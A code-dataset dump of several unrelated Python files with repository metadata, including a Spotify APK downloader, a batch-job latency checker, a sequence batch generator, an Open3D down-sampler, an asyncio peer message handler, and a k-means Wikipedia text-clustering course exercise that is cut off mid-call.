| 31.071895 | 83 | 0.676904 | 0 | 0 | 0 | 0 | 3,702 | 0.778549 | 0 | 0 | 1,602 | 0.336909 |
d311f594d2a844e6d5e6617c53d3b5bdd083d897 | 2,665 | py | Python | spotify_gender_ex/downloader.py | Theta-Dev/Spotify-Gender-Ex | 4e5360f115cb3302397b8e1ad1b11ad96b887ad2 | [
"MIT"
] | 1 | 2022-02-05T16:40:13.000Z | 2022-02-05T16:40:13.000Z | spotify_gender_ex/downloader.py | Theta-Dev/Spotify-Gender-Ex | 4e5360f115cb3302397b8e1ad1b11ad96b887ad2 | [
"MIT"
] | 31 | 2021-06-17T11:59:33.000Z | 2022-03-19T07:05:18.000Z | spotify_gender_ex/downloader.py | Theta-Dev/Spotify-Gender-Ex | 4e5360f115cb3302397b8e1ad1b11ad96b887ad2 | [
"MIT"
] | null | null | null | import os
import re
import urllib.request
import click
import requests
from tqdm import tqdm
URL_UPTODOWN = 'https://spotify.de.uptodown.com/android/download'
URL_GHAPI = 'https://api.github.com/repos/Theta-Dev/Spotify-Gender-Ex/commits/master'
URL_RTABLE = 'https://raw.githubusercontent.com/Theta-Dev/Spotify-Gender-Ex/%s/spotify_gender_ex/res/replacements.json'
class Downloader:
def __init__(self, download_id=''):
pattern_url = re.escape('https://dw.uptodown.com/dwn/') + r'(\w|\.|\/|-|\+|=)+'
pattern_version = r'(?<=<div class=version>)(\d|\.)+'
if download_id:
url = URL_UPTODOWN + '/' + download_id
else:
url = URL_UPTODOWN
try:
r = requests.get(url)
except Exception:
msg = 'Spotify-Version konnte nicht abgerufen werden'
click.echo(msg)
self.spotify_version = 'NA'
self.spotify_url = ''
return
search_url = re.search(pattern_url, r.text)
search_version = re.search(pattern_version, r.text)
if not search_url or not search_version:
msg = 'Spotify-Version nicht gefunden'
click.echo(msg)
self.spotify_version = 'NA'
self.spotify_url = ''
return
self.spotify_url = str(search_url[0])
self.spotify_version = str(search_version[0])
def download_spotify(self, output_path):
if not self.spotify_url:
return False
return _download(self.spotify_url, output_path, 'Spotify')
@staticmethod
def get_replacement_table_raw():
try:
# Get latest commit
sha = requests.get(URL_GHAPI).json()['sha']
return requests.get(URL_RTABLE % sha).text
except Exception:
click.echo('Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle.')
# See here
# https://stackoverflow.com/questions/15644964/python-progress-bar-and-downloads
class _DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def _download(url, output_path, description=''):
if description:
click.echo('Lade %s herunter: %s' % (description, url))
else:
click.echo('Herunterladen: ' + url)
try:
with _DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=url.split('/')[-1]) as t:
urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)
except Exception:
return False
return os.path.isfile(output_path)
| 31.72619 | 119 | 0.630394 | 1,724 | 0.646904 | 0 | 0 | 336 | 0.126079 | 0 | 0 | 660 | 0.247655 |
d311fd05faa731dc82945e27c74b23f364dcc345 | 2,408 | py | Python | robopager/check_type/intraday_latency_check.py | equinoxfitness/robopager | 34bfbfe78d1e310462d781388aabc4a4392ff48a | [
"MIT"
] | 1 | 2020-11-17T17:31:15.000Z | 2020-11-17T17:31:15.000Z | robopager/check_type/intraday_latency_check.py | equinoxfitness/robopager | 34bfbfe78d1e310462d781388aabc4a4392ff48a | [
"MIT"
] | null | null | null | robopager/check_type/intraday_latency_check.py | equinoxfitness/robopager | 34bfbfe78d1e310462d781388aabc4a4392ff48a | [
"MIT"
] | 3 | 2020-03-06T19:43:43.000Z | 2020-03-30T20:01:56.000Z | # Intraday latency check function
from datetime import datetime
import pytz
from datacoco_batch.batch import Batch
from datacoco_core.logger import Logger
log = Logger()
def convert_time(t):
# convert naive datetime object to utc aware datetime
utc = pytz.utc
timetz = utc.localize(t)
return timetz
class CheckWF:
"""
Calls batchy endpoint to get job status.
"""
def __init__(self, wf, batchy_server, batchy_port):
self.b = Batch(wf, batchy_server, batchy_port)
log.l("Checking wf: {}".format(wf))
def check_batchy_wf(self, max_latency):
status = self.b.get_status().get("global")
if status:
failure_count, result = self.calc_latency_tests(
status, max_latency
)
else:
raise ValueError("Could not find wf")
return failure_count, result
@staticmethod
def calc_latency_tests(result, max_latency):
"""
run business logic on result to create alerts
:param result:
:param max_latency:
:return:
"""
failure_count = 0
# use batch start, not end
batch_start = result.get("batch_start")
latency = (
datetime.now(pytz.utc)
- convert_time(
datetime.strptime(batch_start, "%Y-%m-%dT%H:%M:%S.%f")
)
).seconds / 60
if latency >= max_latency:
log.l(
"latency: {} is greater than max latency: {}".format(
latency, max_latency
)
)
failure_count = 1
result["alert_level"] = "FAILURE"
result["alert_message"] = "latency issue"
elif result["status"] == "failure":
log.l("failure b/c of job failure")
result["alert_level"] = "FAILURE"
result["alert_message"] = "job failure"
elif latency >= max_latency * 0.8:
log.l(
"latency: {} is greater than 80% of max latency: {}".format(
latency, max_latency
)
)
result["alert_level"] = "WARNING"
result["alert_message"] = "passed 80% of latency threshold"
else:
result["alert_level"] = "SUCCESS"
log.l("Success")
result["latency"] = latency
return failure_count, result
| 28.329412 | 76 | 0.550664 | 2,085 | 0.865864 | 0 | 0 | 1,519 | 0.630814 | 0 | 0 | 738 | 0.306478 |
d313915d061fa34def9177d5f7b820de9a9fdfa5 | 3,633 | py | Python | data_util.py | imalikshake/StyleNet | b3e2a0de1e9503cfc3b5aca1748085b9b3a97c1a | [
"CC-BY-4.0"
] | 202 | 2017-06-07T17:41:04.000Z | 2022-02-15T02:13:38.000Z | data_util.py | Her-shey/StyleNet | b3e2a0de1e9503cfc3b5aca1748085b9b3a97c1a | [
"CC-BY-4.0"
] | 4 | 2017-07-06T04:16:05.000Z | 2021-06-12T11:01:18.000Z | data_util.py | Her-shey/StyleNet | b3e2a0de1e9503cfc3b5aca1748085b9b3a97c1a | [
"CC-BY-4.0"
] | 44 | 2017-06-07T21:56:51.000Z | 2021-08-06T02:41:35.000Z | import numpy as np
class BatchGenerator(object):
'''Generator for returning shuffled batches.
data_x -- list of input matrices
data_y -- list of output matrices
batch_size -- size of batch
input_size -- input width
output_size -- output width
mini -- create subsequences for truncating backprop
mini_len -- truncated backprop window'''
def __init__(self, data_x, data_y, batch_size, input_size, output_size, mini=True, mini_len=200):
self.input_size = input_size
self.output_size = output_size
self.data_x = data_x
self.data_y = data_y
self.batch_size = batch_size
self.batch_count = len(range(0, len(self.data_x), self.batch_size))
self.batch_length = None
self.mini = mini
self.mini_len = mini_len
def batch(self):
while True:
idxs = np.arange(0, len(self.data_x))
np.random.shuffle(idxs)
# np.random.shuffle(idxs)
shuff_x = []
shuff_y = []
for i in idxs:
shuff_x.append(self.data_x[i])
shuff_y.append(self.data_y[i])
for batch_idx in range(0, len(self.data_x), self.batch_size):
input_batch = []
output_batch = []
for j in xrange(batch_idx, min(batch_idx+self.batch_size,len(self.data_x)), 1):
input_batch.append(shuff_x[j])
output_batch.append(shuff_y[j])
input_batch, output_batch, seq_len = self.pad(input_batch, output_batch)
yield input_batch, output_batch, seq_len
def pad(self, sequence_X, sequence_Y):
current_batch = len(sequence_X)
padding_X = [0]*self.input_size
padding_Y = [0]*self.output_size
lens = [sequence_X[i].shape[0] for i in range(len(sequence_X))]
# lens2 = [sequence_Y[i].shape[0] for i in range(len(sequence_Y))]
#
max_lens = max(lens)
# max_lens2 = max(lens2)
#
# assert max_lens == max_lens2
# print(max_lens)
for i, x in enumerate(lens):
length = x
a = list(sequence_X[i])
b = list(sequence_Y[i])
while length < max_lens:
a.append(padding_X)
b.append(padding_Y)
length+=1
if self.mini:
while length % self.mini_len != 0:
a.append(padding_X)
b.append(padding_Y)
length+=1
sequence_X[i] = np.array(a)
sequence_Y[i] = np.array(b)
# for x in minis:
# mini_X.append(np.array(a[x:min(x+self.mini,x)]))
# mini_Y.append(np.array(b[x:min(x+self.mini,x)]))
# print sequence_X[i].shape
# print sequence_Y[i].shape
# assert all(x.shape == (max_lens, self.input_size) for x in sequence_X)
# assert all(y.shape == (max_lens, self.output_size) for y in sequence_Y)
sequence_X = np.vstack([np.expand_dims(x, 1) for x in sequence_X])
sequence_Y = np.vstack([np.expand_dims(y, 1) for y in sequence_Y])
if not self.mini:
mini_batches = 1
max_lens = max(lens)
else:
mini_batches = length/self.mini_len
max_lens = self.mini_len
sequence_X = np.reshape(sequence_X, [current_batch*mini_batches, max_lens, self.input_size])
sequence_Y = np.reshape(sequence_Y, [current_batch*mini_batches, max_lens, self.output_size])
return sequence_X, sequence_Y, max_lens
| 36.33 | 101 | 0.573631 | 3,612 | 0.99422 | 818 | 0.225158 | 0 | 0 | 0 | 0 | 803 | 0.221029 |
d315ddafc00e303827ed142f393b01062bb40a46 | 720 | py | Python | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | 3 | 2022-01-16T12:43:29.000Z | 2022-01-22T05:21:40.000Z | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import open3d as o3d
def downSample(pointcloud_file_path, down_sample_cluster_num, save_pointcloud_file_path):
print("[INFO][downSample]")
print("\t start down sampling pointcloud :")
print("\t down_sample_cluster_num = " + str(down_sample_cluster_num) + "...")
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
down_sampled_pointcloud = o3d.geometry.PointCloud.uniform_down_sample(
pointcloud, down_sample_cluster_num)
o3d.io.write_point_cloud(
save_pointcloud_file_path,
down_sampled_pointcloud,
write_ascii=True,
print_progress=True)
print("SUCCESS!")
return True
| 31.304348 | 89 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 147 | 0.204167 |
d315fff20454a99b5425854a126c0fa656788a07 | 3,562 | py | Python | congregation/net/handler.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 3 | 2020-10-05T16:30:15.000Z | 2021-01-22T13:38:02.000Z | congregation/net/handler.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | null | null | null | congregation/net/handler.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 1 | 2021-02-19T12:40:57.000Z | 2021-02-19T12:40:57.000Z | import asyncio
import pickle
from congregation.net.messages import *
class Handler:
def __init__(self, peer, server: [asyncio.Protocol, None] = None):
self.peer = peer
self.server = server
self.msg_handlers = self._define_msg_map()
def handle_msg(self, data):
"""
determine message type and handle accordingly
"""
if isinstance(data, Msg):
m = data
else:
m = pickle.loads(data)
if m.pid not in self.peer.peer_connections:
raise Exception(f"Msg of type {m.msg_type} received from unrecognized peer: {m.pid}")
self.msg_handlers[m.msg_type](m)
def _define_msg_map(self):
return {
"IAM": self.handle_iam_msg,
"READY": self.handle_ready_msg,
"CONFIG": self.handle_config_msg,
"ACK": self.handle_ack_msg,
"REQUEST": self.handle_request_msg
}
def _check_dispatcher(self, m: [ReadyMsg, ConfigMsg, AckMsg, RequestMsg]):
if self.peer.dispatcher is not None:
if self.peer.dispatcher.dispatch_type == m.job_type:
return True
self.peer.msg_buffer.append(m)
return False
def handle_iam_msg(self, m: IAMMsg):
"""
we need to be able to resolve which party a given connection
is for, which is why a done callback is added to the connection
future which sends an IAMMsg with the pid of the connecting party.
this function sets that connection value in peer.peer_connections
accordingly when an IAMMsg is received.
"""
print(f"IAMMsg received from {m.pid}")
conn = self.peer.peer_connections[m.pid]
if isinstance(conn, asyncio.Future):
if not conn.done():
conn.set_result((self.server.transport, self))
def handle_ready_msg(self, m: ReadyMsg):
if self._check_dispatcher(m):
print(f"ReadyMsg received from party {m.pid} for {m.job_type} job.")
rdy = self.peer.dispatcher.parties_ready[m.pid]
if isinstance(rdy, asyncio.Future):
if not rdy.done():
rdy.set_result(True)
def handle_config_msg(self, m: ConfigMsg):
if self._check_dispatcher(m):
print(f"ConfigMsg received from party {m.pid} for {m.job_type} job.")
cfg = self.peer.dispatcher.parties_config[m.pid]["CFG"]
if isinstance(cfg, asyncio.Future):
if not cfg.done():
cfg.set_result(m.config)
print(f"Sending AckMsg to party {m.pid} for receipt of ConfigMsg for {m.job_type} job.")
self.peer.send_ack(
m.pid,
"CONFIG",
m.job_type
)
def handle_ack_msg(self, m: AckMsg):
if self._check_dispatcher(m):
print(f"AckMsg of type {m.ack_type} received from party {m.pid} for {m.job_type} job.")
if m.ack_type == "CONFIG":
a = self.peer.dispatcher.parties_config[m.pid]["ACK"]
if isinstance(a, asyncio.Future):
if not a.done():
a.set_result(True)
def handle_request_msg(self, m: RequestMsg):
if self._check_dispatcher(m):
print(f"Request message for {m.request_type} received from party {m.pid} for {m.job_type} job.")
if m.request_type == "CONFIG":
self.peer.send_cfg(m.pid, self.peer.dispatcher.config_to_exchange, m.job_type)
| 35.62 | 108 | 0.590118 | 3,490 | 0.979787 | 0 | 0 | 0 | 0 | 0 | 0 | 962 | 0.270073 |
d3162e78a871415bab1f9452d82a894abaab0f56 | 44,224 | py | Python | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington1 | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | 20 | 2017-04-06T08:50:58.000Z | 2021-11-01T13:43:22.000Z | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | null | null | null | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | 24 | 2016-06-01T21:28:17.000Z | 2021-10-02T03:17:11.000Z |
# coding: utf-8
# # k-means with text data
# In this assignment you will
# * Cluster Wikipedia documents using k-means
# * Explore the role of random initialization on the quality of the clustering
# * Explore how results differ after changing the number of clusters
# * Evaluate clustering, both quantitatively and qualitatively
#
# When properly executed, clustering uncovers valuable insights from a set of unlabeled documents.
# **Note to Amazon EC2 users**: To conserve memory, make sure to stop all the other notebooks before running this notebook.
# ## Import necessary packages
# The following code block will check if you have the correct version of GraphLab Create. Any version later than 1.8.5 will do. To upgrade, read [this page](https://turi.com/download/upgrade-graphlab-create.html).
# In[1]:
import os
os.environ["OMP_NUM_THREADS"] = "1"
import graphlab
graphlab.SArray(range(1000)).apply(lambda x: x)
# In[2]:
import matplotlib.pyplot as plt
import numpy as np
import sys
import os
from scipy.sparse import csr_matrix
get_ipython().magic(u'matplotlib inline')
'''Check GraphLab Create version'''
from distutils.version import StrictVersion
assert (StrictVersion(graphlab.version) >= StrictVersion('1.8.5')), 'GraphLab Create must be version 1.8.5 or later.'
# ## Load data, extract features
# To work with text data, we must first convert the documents into numerical features. As in the first assignment, let's extract TF-IDF features for each article.
# In[3]:
wiki = graphlab.SFrame('people_wiki.gl/')
# In[4]:
wiki['tf_idf'] = graphlab.text_analytics.tf_idf(wiki['text'])
# For the remainder of the assignment, we will use sparse matrices. Sparse matrices are matrices that have a small number of nonzero entries. A good data structure for sparse matrices would only store the nonzero entries to save space and speed up computation. SciPy provides a highly-optimized library for sparse matrices. Many matrix operations available for NumPy arrays are also available for SciPy sparse matrices.
#
# We first convert the TF-IDF column (in dictionary format) into the SciPy sparse matrix format. We included plenty of comments for the curious; if you'd like, you may skip the next block and treat the function as a black box.
# In[5]:
def sframe_to_scipy(x, column_name):
'''
Convert a dictionary column of an SFrame into a sparse matrix format where
each (row_id, column_id, value) triple corresponds to the value of
x[row_id][column_id], where column_id is a key in the dictionary.
Example
>>> sparse_matrix, map_key_to_index = sframe_to_scipy(sframe, column_name)
'''
assert x[column_name].dtype() == dict, 'The chosen column must be dict type, representing sparse data.'
# Create triples of (row_id, feature_id, count).
# 1. Add a row number.
x = x.add_row_number()
# 2. Stack will transform x to have a row for each unique (row, key) pair.
x = x.stack(column_name, ['feature', 'value'])
# Map words into integers using a OneHotEncoder feature transformation.
f = graphlab.feature_engineering.OneHotEncoder(features=['feature'])
# 1. Fit the transformer using the above data.
f.fit(x)
# 2. The transform takes 'feature' column and adds a new column 'feature_encoding'.
x = f.transform(x)
# 3. Get the feature mapping.
mapping = f['feature_encoding']
# 4. Get the feature id to use for each key.
x['feature_id'] = x['encoded_features'].dict_keys().apply(lambda x: x[0])
# Create numpy arrays that contain the data for the sparse matrix.
i = np.array(x['id'])
j = np.array(x['feature_id'])
v = np.array(x['value'])
width = x['id'].max() + 1
height = x['feature_id'].max() + 1
# Create a sparse matrix.
mat = csr_matrix((v, (i, j)), shape=(width, height))
return mat, mapping
# In[6]:
# The conversion will take about a minute or two.
tf_idf, map_index_to_word = sframe_to_scipy(wiki, 'tf_idf')
# In[7]:
tf_idf
# The above matrix contains a TF-IDF score for each of the 59071 pages in the data set and each of the 547979 unique words.
# ## Normalize all vectors
# As discussed in the previous assignment, Euclidean distance can be a poor metric of similarity between documents, as it unfairly penalizes long articles. For a reasonable assessment of similarity, we should disregard the length information and use length-agnostic metrics, such as cosine distance.
#
# The k-means algorithm does not directly work with cosine distance, so we take an alternative route to remove length information: we normalize all vectors to be unit length. It turns out that Euclidean distance closely mimics cosine distance when all vectors are unit length. In particular, the squared Euclidean distance between any two vectors of length one is directly proportional to their cosine distance.
#
# We can prove this as follows. Let $\mathbf{x}$ and $\mathbf{y}$ be normalized vectors, i.e. unit vectors, so that $\|\mathbf{x}\|=\|\mathbf{y}\|=1$. Write the squared Euclidean distance as the dot product of $(\mathbf{x} - \mathbf{y})$ to itself:
# \begin{align*}
# \|\mathbf{x} - \mathbf{y}\|^2 &= (\mathbf{x} - \mathbf{y})^T(\mathbf{x} - \mathbf{y})\\
# &= (\mathbf{x}^T \mathbf{x}) - 2(\mathbf{x}^T \mathbf{y}) + (\mathbf{y}^T \mathbf{y})\\
# &= \|\mathbf{x}\|^2 - 2(\mathbf{x}^T \mathbf{y}) + \|\mathbf{y}\|^2\\
# &= 2 - 2(\mathbf{x}^T \mathbf{y})\\
# &= 2(1 - (\mathbf{x}^T \mathbf{y}))\\
# &= 2\left(1 - \frac{\mathbf{x}^T \mathbf{y}}{\|\mathbf{x}\|\|\mathbf{y}\|}\right)\\
# &= 2\left[\text{cosine distance}\right]
# \end{align*}
#
# This tells us that two **unit vectors** that are close in Euclidean distance are also close in cosine distance. Thus, the k-means algorithm (which naturally uses Euclidean distances) on normalized vectors will produce the same results as clustering using cosine distance as a distance metric.
#
# We import the [`normalize()` function](http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.normalize.html) from scikit-learn to normalize all vectors to unit length.
# In[8]:
from sklearn.preprocessing import normalize
tf_idf = normalize(tf_idf)
# ## Implement k-means
# Let us implement the k-means algorithm. First, we choose an initial set of centroids. A common practice is to choose randomly from the data points.
#
# **Note:** We specify a seed here, so that everyone gets the same answer. In practice, we highly recommend to use different seeds every time (for instance, by using the current timestamp).
# In[9]:
def get_initial_centroids(data, k, seed=None):
'''Randomly choose k data points as initial centroids'''
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
n = data.shape[0] # number of data points
# Pick K indices from range [0, N).
rand_indices = np.random.randint(0, n, k)
# Keep centroids as dense format, as many entries will be nonzero due to averaging.
# As long as at least one document in a cluster contains a word,
# it will carry a nonzero weight in the TF-IDF vector of the centroid.
centroids = data[rand_indices,:].toarray()
return centroids
# After initialization, the k-means algorithm iterates between the following two steps:
# 1. Assign each data point to the closest centroid.
# $$
# z_i \gets \mathrm{argmin}_j \|\mu_j - \mathbf{x}_i\|^2
# $$
# 2. Revise centroids as the mean of the assigned data points.
# $$
# \mu_j \gets \frac{1}{n_j}\sum_{i:z_i=j} \mathbf{x}_i
# $$
# In pseudocode, we iteratively do the following:
# ```
# cluster_assignment = assign_clusters(data, centroids)
# centroids = revise_centroids(data, k, cluster_assignment)
# ```
# ### Assigning clusters
# How do we implement Step 1 of the main k-means loop above? First import `pairwise_distances` function from scikit-learn, which calculates Euclidean distances between rows of given arrays. See [this documentation](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.pairwise_distances.html) for more information.
#
# For the sake of demonstration, let's look at documents 100 through 102 as query documents and compute the distances between each of these documents and every other document in the corpus. In the k-means algorithm, we will have to compute pairwise distances between the set of centroids and the set of documents.
# In[10]:
from sklearn.metrics import pairwise_distances
# Get the TF-IDF vectors for documents 100 through 102.
queries = tf_idf[100:102,:]
# Compute pairwise distances from every data point to each query vector.
dist = pairwise_distances(tf_idf, queries, metric='euclidean')
print dist
# More formally, `dist[i,j]` is assigned the distance between the `i`th row of `X` (i.e., `X[i,:]`) and the `j`th row of `Y` (i.e., `Y[j,:]`).
# **Checkpoint:** For a moment, suppose that we initialize three centroids with the first 3 rows of `tf_idf`. Write code to compute distances from each of the centroids to all data points in `tf_idf`. Then find the distance between row 430 of `tf_idf` and the second centroid and save it to `dist`.
# In[14]:
# Students should write code here
centroids = tf_idf[:3,:]
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
distances.shape
# In[15]:
dist = distances[430, 1]
# In[16]:
'''Test cell'''
if np.allclose(dist, pairwise_distances(tf_idf[430,:], tf_idf[1,:])):
print('Pass')
else:
print('Check your code again')
# **Checkpoint:** Next, given the pairwise distances, we take the minimum of the distances for each data point. Fittingly, NumPy provides an `argmin` function. See [this documentation](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.argmin.html) for details.
#
# Read the documentation and write code to produce a 1D array whose i-th entry indicates the centroid that is the closest to the i-th data point. Use the list of distances from the previous checkpoint and save them as `distances`. The value 0 indicates closeness to the first centroid, 1 indicates closeness to the second centroid, and so forth. Save this array as `closest_cluster`.
#
# **Hint:** the resulting array should be as long as the number of data points.
# In[17]:
# Students should write code here
closest_cluster = np.argmin(distances, axis=1)
# In[18]:
'''Test cell'''
reference = [list(row).index(min(row)) for row in distances]
if np.allclose(closest_cluster, reference):
print('Pass')
else:
print('Check your code again')
# **Checkpoint:** Let's put these steps together. First, initialize three centroids with the first 3 rows of `tf_idf`. Then, compute distances from each of the centroids to all data points in `tf_idf`. Finally, use these distance calculations to compute cluster assignments and assign them to `cluster_assignment`.
# In[19]:
# Students should write code here
centroids = tf_idf[:3,:]
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
cluster_assignment = np.argmin(distances, axis=1)
# In[20]:
if len(cluster_assignment)==59071 and np.array_equal(np.bincount(cluster_assignment), np.array([23061, 10086, 25924])):
print('Pass') # count number of data points for each cluster
else:
print('Check your code again.')
# Now we are ready to fill in the blanks in this function:
# In[21]:
def assign_clusters(data, centroids):
# Compute distances between each data point and the set of centroids:
# Fill in the blank (RHS only)
distances_from_centroids = pairwise_distances(data, centroids, metric='euclidean')
# Compute cluster assignments for each data point:
# Fill in the blank (RHS only)
cluster_assignment = np.argmin(distances_from_centroids, axis=1)
return cluster_assignment
# **Checkpoint**. For the last time, let us check if Step 1 was implemented correctly. With rows 0, 2, 4, and 6 of `tf_idf` as an initial set of centroids, we assign cluster labels to rows 0, 10, 20, ..., and 90 of `tf_idf`. The resulting cluster labels should be `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`.
# In[22]:
if np.allclose(assign_clusters(tf_idf[0:100:10], tf_idf[0:8:2]), np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1])):
print('Pass')
else:
print('Check your code again.')
# ### Revising clusters
# Let's turn to Step 2, where we compute the new centroids given the cluster assignments.
# SciPy and NumPy arrays allow for filtering via Boolean masks. For instance, we filter all data points that are assigned to cluster 0 by writing
# ```
# data[cluster_assignment==0,:]
# ```
# To develop intuition about filtering, let's look at a toy example consisting of 3 data points and 2 clusters.
# In[23]:
data = np.array([[1., 2., 0.],
[0., 0., 0.],
[2., 2., 0.]])
centroids = np.array([[0.5, 0.5, 0.],
[0., -0.5, 0.]])
# Let's assign these data points to the closest centroid.
# In[24]:
cluster_assignment = assign_clusters(data, centroids)
print cluster_assignment
# The expression `cluster_assignment==1` gives a list of Booleans that says whether each data point is assigned to cluster 1 or not:
# In[25]:
cluster_assignment==1
# Likewise for cluster 0:
# In[27]:
cluster_assignment==0
# In lieu of indices, we can put in the list of Booleans to pick and choose rows. Only the rows that correspond to a `True` entry will be retained.
#
# First, let's look at the data points (i.e., their values) assigned to cluster 1:
# In[28]:
data[cluster_assignment==1]
# This makes sense since [0 0 0] is closer to [0 -0.5 0] than to [0.5 0.5 0].
#
# Now let's look at the data points assigned to cluster 0:
# In[29]:
data[cluster_assignment==0]
# Again, this makes sense since these values are each closer to [0.5 0.5 0] than to [0 -0.5 0].
#
# Given all the data points in a cluster, it only remains to compute the mean. Use [np.mean()](http://docs.scipy.org/doc/numpy-1.10.0/reference/generated/numpy.mean.html). By default, the function averages all elements in a 2D array. To compute row-wise or column-wise means, add the `axis` argument. See the linked documentation for details.
#
# Use this function to average the data points in cluster 0:
# In[30]:
data[cluster_assignment==0].mean(axis=0)
# We are now ready to complete this function:
# In[31]:
def revise_centroids(data, k, cluster_assignment):
new_centroids = []
for i in xrange(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i]
# Compute the mean of the data points. Fill in the blank (RHS only)
centroid = member_data_points.mean(axis=0)
# Convert numpy.matrix type to numpy.ndarray type
centroid = centroid.A1
new_centroids.append(centroid)
new_centroids = np.array(new_centroids)
return new_centroids
# **Checkpoint**. Let's check our Step 2 implementation. Letting rows 0, 10, ..., 90 of `tf_idf` as the data points and the cluster labels `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`, we compute the next set of centroids. Each centroid is given by the average of all member data points in corresponding cluster.
# In[32]:
result = revise_centroids(tf_idf[0:100:10], 3, np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1]))
if np.allclose(result[0], np.mean(tf_idf[[0,30,40,60]].toarray(), axis=0)) and np.allclose(result[1], np.mean(tf_idf[[10,20,90]].toarray(), axis=0)) and np.allclose(result[2], np.mean(tf_idf[[50,70,80]].toarray(), axis=0)):
print('Pass')
else:
print('Check your code')
# ### Assessing convergence
# How can we tell if the k-means algorithm is converging? We can look at the cluster assignments and see if they stabilize over time. In fact, we'll be running the algorithm until the cluster assignments stop changing at all. To be extra safe, and to assess the clustering performance, we'll be looking at an additional criteria: the sum of all squared distances between data points and centroids. This is defined as
# $$
# J(\mathcal{Z},\mu) = \sum_{j=1}^k \sum_{i:z_i = j} \|\mathbf{x}_i - \mu_j\|^2.
# $$
# The smaller the distances, the more homogeneous the clusters are. In other words, we'd like to have "tight" clusters.
# In[33]:
def compute_heterogeneity(data, k, centroids, cluster_assignment):
heterogeneity = 0.0
for i in xrange(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment==i, :]
if member_data_points.shape[0] > 0: # check if i-th cluster is non-empty
# Compute distances from centroid to data points (RHS only)
distances = pairwise_distances(member_data_points, [centroids[i]], metric='euclidean')
squared_distances = distances**2
heterogeneity += np.sum(squared_distances)
return heterogeneity
# Let's compute the cluster heterogeneity for the 2-cluster example we've been considering based on our current cluster assignments and centroids.
# In[34]:
compute_heterogeneity(data, 2, centroids, cluster_assignment)
# ### Combining into a single function
# Once the two k-means steps have been implemented, as well as our heterogeneity metric we wish to monitor, it is only a matter of putting these functions together to write a k-means algorithm that
#
# * Repeatedly performs Steps 1 and 2
# * Tracks convergence metrics
# * Stops if either no assignment changed or we reach a certain number of iterations.
# In[35]:
# Fill in the blanks
def kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False):
'''This function runs k-means on given data and initial set of centroids.
maxiter: maximum number of iterations to run.
record_heterogeneity: (optional) a list, to store the history of heterogeneity as function of iterations
if None, do not store the history.
verbose: if True, print how many data points changed their cluster labels in each iteration'''
centroids = initial_centroids[:]
prev_cluster_assignment = None
for itr in xrange(maxiter):
if verbose:
print(itr)
# 1. Make cluster assignments using nearest centroids
# YOUR CODE HERE
cluster_assignment = assign_clusters(data, centroids)
# 2. Compute a new centroid for each of the k clusters, averaging all data points assigned to that cluster.
# YOUR CODE HERE
centroids = revise_centroids(data, k, cluster_assignment)
# Check for convergence: if none of the assignments changed, stop
if prev_cluster_assignment is not None and (prev_cluster_assignment==cluster_assignment).all():
break
# Print number of new assignments
if prev_cluster_assignment is not None:
num_changed = np.sum(prev_cluster_assignment!=cluster_assignment)
if verbose:
print(' {0:5d} elements changed their cluster assignment.'.format(num_changed))
# Record heterogeneity convergence metric
if record_heterogeneity is not None:
# YOUR CODE HERE
score = compute_heterogeneity(data, k, centroids, cluster_assignment)
record_heterogeneity.append(score)
prev_cluster_assignment = cluster_assignment[:]
return centroids, cluster_assignment
# ## Plotting convergence metric
# We can use the above function to plot the convergence metric across iterations.
# In[36]:
def plot_heterogeneity(heterogeneity, k):
plt.figure(figsize=(7,4))
plt.plot(heterogeneity, linewidth=4)
plt.xlabel('# Iterations')
plt.ylabel('Heterogeneity')
plt.title('Heterogeneity of clustering over time, K={0:d}'.format(k))
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
# Let's consider running k-means with K=3 clusters for a maximum of 400 iterations, recording cluster heterogeneity at every step. Then, let's plot the heterogeneity over iterations using the plotting function above.
# In[37]:
k = 3
heterogeneity = []
initial_centroids = get_initial_centroids(tf_idf, k, seed=0)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
